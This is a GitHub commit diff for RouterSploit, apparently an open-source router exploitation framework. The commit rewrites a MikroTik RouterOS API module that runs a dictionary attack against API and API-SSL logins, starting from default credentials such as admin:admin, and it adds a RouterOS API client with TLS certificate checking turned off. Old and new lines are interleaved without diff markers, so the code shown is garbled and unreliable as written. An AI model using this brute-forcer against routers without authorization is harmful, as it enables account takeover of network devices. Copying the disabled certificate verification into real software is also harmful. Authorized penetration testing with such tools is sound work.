Unverified Commit 92880a05 by Marcin Bury Committed by GitHub

Fix Mikrotik RouterOS API creds module (#816)

parent ecf1b5a4
# MIT License
# The code is taken from https://github.com/LaiArturs/RouterOS_API/
# All credits go to Arturs Laizans - https://github.com/LaiArtur
import sys
import binascii
import hashlib
import socket
import ssl
CONTEXT = ssl.create_default_context()
CONTEXT.check_hostname = False
CONTEXT.verify_mode = ssl.CERT_NONE
class LoginError(Exception):
class WordTooLong(Exception):
class CreateSocketError(Exception):
class RouterOSTrapError(Exception):
class ApiRosClient(object):
"RouterOS API"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
def login(self, username, pwd):
for repl, attrs in self.talk(["/login"]):
chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8'))
md = hashlib.md5()
output = self.talk([
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
return output
def talk(self, words):
if self.writeSentence(words) == 0:
r = []
while 1:
i = self.readSentence()
if len(i) == 0:
reply = i[0]
attrs = {}
for w in i[1:]:
j = w.find('=', 1)
if (j == -1):
attrs[w] = ''
def __init__(self, address, port, user, password, use_ssl=False,
context=CONTEXT, timeout=TIMEOUT):
self.address = address
self.user = user
self.password = password
self.use_ssl = use_ssl
self.port = port
self.context = context
self.timeout = timeout
# Port setting logic
if port:
self.port = port
elif use_ssl:
self.port = SSL_PORT
attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs))
if reply == '!done':
return r
self.port = PORT
self.sock = None
self.connection = None
# Open socket connection with router and wrap with SSL if needed.
def open_socket(self):
for res in socket.getaddrinfo(self.address, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
self.sock = socket.socket(af, socket.SOCK_STREAM)
# Trying to connect to RouterOS, error can occur if IP address is not reachable, or API is blocked in
# RouterOS firewall or ip services, or port is wrong.
self.connection = self.sock.connect(sa)
except OSError:
raise CreateSocketError('Error: API failed to connect to socket. Host: {}, port: {}.'.format(self.address,
if self.use_ssl:
self.sock = self.context.wrap_socket(self.sock)
def login(self):
def reply_has_error(reply):
# Check if reply contains login error
if len(reply[0]) == 2 and reply[0][0] == '!trap':
return True
return False
def process_old_login(reply):
# RouterOS uses old API login method, code continues with old method
md5 = hashlib.md5(('\x00' + self.password).encode('utf-8'))
sentence = ['/login', '=name=' + self.user, '=response=00'
+ binascii.hexlify(md5.digest()).decode('utf-8')]
reply = self.communicate(sentence)
return check_reply(reply)
def check_reply(reply):
if len(reply[0]) == 1 and reply[0][0] == '!done':
# If login process was successful
return reply
elif reply_has_error(reply):
raise LoginError(reply)
elif len(reply[0]) == 2 and reply[0][1][0:5] == '=ret=':
return process_old_login(reply)
raise LoginError(f'Unexpected reply to login: {reply}')
sentence = ['/login', '=name=' + self.user, '=password=' + self.password]
reply = self.communicate(sentence)
return check_reply(reply)
# Sending data to router and expecting something back
def communicate(self, sentence_to_send):
# There is specific way of sending word length in RouterOS API.
# See RouterOS API Wiki for more info.
def send_length(w):
length_to_send = len(w)
if length_to_send < 0x80:
num_of_bytes = 1 # For words smaller than 128
elif length_to_send < 0x4000:
length_to_send += 0x8000
num_of_bytes = 2 # For words smaller than 16384
elif length_to_send < 0x200000:
length_to_send += 0xC00000
num_of_bytes = 3 # For words smaller than 2097152
elif length_to_send < 0x10000000:
length_to_send += 0xE0000000
num_of_bytes = 4 # For words smaller than 268435456
elif length_to_send < 0x100000000:
num_of_bytes = 4 # For words smaller than 4294967296
raise WordTooLong('Word is too long. Max length of word is 4294967295.')
self.sock.sendall(length_to_send.to_bytes(num_of_bytes, byteorder='big'))
# Actually I haven't successfully sent words larger than approx. 65520.
# Probably it is some RouterOS limitation of 2^16.
# The same logic applies for receiving word length from RouterOS side.
# See RouterOS API Wiki for more info.
def receive_length():
r = self.sock.recv(1) # Receive the first byte of word length
# If the first byte of word is smaller than 80 (base 16),
# then we already received the whole length and can return it.
# Otherwise if it is larger, then word size is encoded in multiple bytes and we must receive them all to
# get the whole word size.
if r < b'\x80':
r = int.from_bytes(r, byteorder='big')
elif r < b'\xc0':
r += self.sock.recv(1)
r = int.from_bytes(r, byteorder='big')
r -= 0x8000
elif r < b'\xe0':
r += self.sock.recv(2)
r = int.from_bytes(r, byteorder='big')
r -= 0xC00000
elif r < b'\xf0':
r += self.sock.recv(3)
r = int.from_bytes(r, byteorder='big')
r -= 0xE0000000
elif r == b'\xf0':
r = self.sock.recv(4)
r = int.from_bytes(r, byteorder='big')
def writeSentence(self, words):
ret = 0
for w in words:
ret += 1
return ret
def readSentence(self):
r = []
while 1:
w = self.readWord()
if w == '':
return r
def writeWord(self, w):
def readWord(self):
ret = self.readStr(self.readLen())
return ret
def writeLen(self, length):
if length < 0x80:
self.writeByte((length).to_bytes(1, sys.byteorder))
elif length < 0x4000:
length |= 0x8000
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x200000:
length |= 0xC00000
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x10000000:
length |= 0xE0000000
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def read_sentence():
rcv_sentence = [] # Words will be appended here
rcv_length = receive_length() # Get the size of the word
while rcv_length != 0:
received = b''
while rcv_length > len(received):
rec = self.sock.recv(rcv_length - len(received))
if rec == b'':
raise RuntimeError('socket connection broken')
received += rec
received = received.decode('utf-8', 'backslashreplace')
rcv_length = receive_length() # Get the size of the next word
return rcv_sentence
# Sending part of conversation
# Each word must be sent separately.
# First, length of the word must be sent,
# Then, the word itself.
for word in sentence_to_send:
self.sock.sendall(word.encode('utf-8')) # Sending the word
self.sock.sendall(b'\x00') # Send zero length word to mark end of the sentence
# Receiving part of the conversation
# Will continue receiving until receives '!done' or some kind of error (!trap).
# Everything will be appended to paragraph variable, and then returned.
paragraph = []
received_sentence = ['']
while received_sentence[0] != '!done':
received_sentence = read_sentence()
return paragraph
# Initiate a conversation with the router
def talk(self, message):
# It is possible for message to be string, tuple or list containing multiple strings or tuples
if type(message) == str or type(message) == tuple:
return self.send(message)
elif type(message) == list:
reply = []
for sentence in message:
return reply
self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
raise TypeError('talk() argument must be str or tuple containing str or list containing str or tuples')
def send(self, sentence):
# If sentence is string, not tuples of strings, it must be divided in words
if type(sentence) == str:
sentence = sentence.split()
reply = self.communicate(sentence)
# If RouterOS returns error from command that was sent
if '!trap' in reply[0][0]:
# You can comment following line out if you don't want to raise an error in case of !trap
raise RouterOSTrapError("\nCommand: {}\nReturned an error: {}".format(sentence, reply))
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def writeStr(self, str):
n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def writeByte(self, str):
n = 0
while n < len(str):
r = self.sk.send(str[n:])
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s is None or s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
# reply is list containing strings with RAW output form API
# nice_reply is a list containing output form API sorted in dictionary for easier use later
nice_reply = []
for m in range(len(reply) - 1):
for k, v in (x[1:].split('=', 1) for x in reply[m][1:]):
nice_reply[m][k] = v
return nice_reply
def is_alive(self) -> bool:
"""Check if socket is alive and router responds"""
# Check if socket is open in this end
except OSError:
return False
# Check if we can send and receive through socket
except (socket.timeout, IndexError, BrokenPipeError):
return False
return True
def create_connection(self):
def close(self):
import socket
import ssl
from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.libs.apiros.apiros_client import ApiRosClient
from routersploit.libs.apiros.apiros_client import ApiRosClient, LoginError
class Exploit(TCPClient):
__info__ = {
"name": "Mikrotik Default Creds - API ROS",
"description": "",
"description": "Module performs dictionary attack against Mikrotik API and API-SSL. "
"If valid credentials are found they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
......@@ -18,6 +22,8 @@ class Exploit(TCPClient):
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(8728, "Target API port")
ssl = OptBool(False, "Use SSL for API")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
......@@ -44,30 +50,53 @@ class Exploit(TCPClient):
print_error("Credentials not found")
def target_function(self, running, creds):
while running.is_set():
def login(self, username, password):
username, password = creds.next().split(":", 1)
tcp_client = self.tcp_create()
tcp_sock = tcp_client.connect()
apiros = ApiRosClient(tcp_client)
apiros = ApiRosClient(
output = apiros.login(username, password)
output = apiros.login()
if output[0][0] == "!done":
if self.stop_on_success:
print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
self.credentials.append((self.target, self.port, self.target_protocol, username, password))
return True
print_error("Unexpected Response - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbossity)
except LoginError:
print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
except ssl.SSLError:
print_error("SSL Error, retrying...")
return self.login(username, password)
return False
def target_function(self, running, creds):
while running.is_set():
username = ""
passsword = ""
username, password = creds.next().split(":", 1)
if self.login(username, password) and self.stop_on_success:
except RuntimeError:
print_error("Connection closed by remote end")
except socket.timeout:
print_error("Timeout waiting for the response")
except StopIteration:
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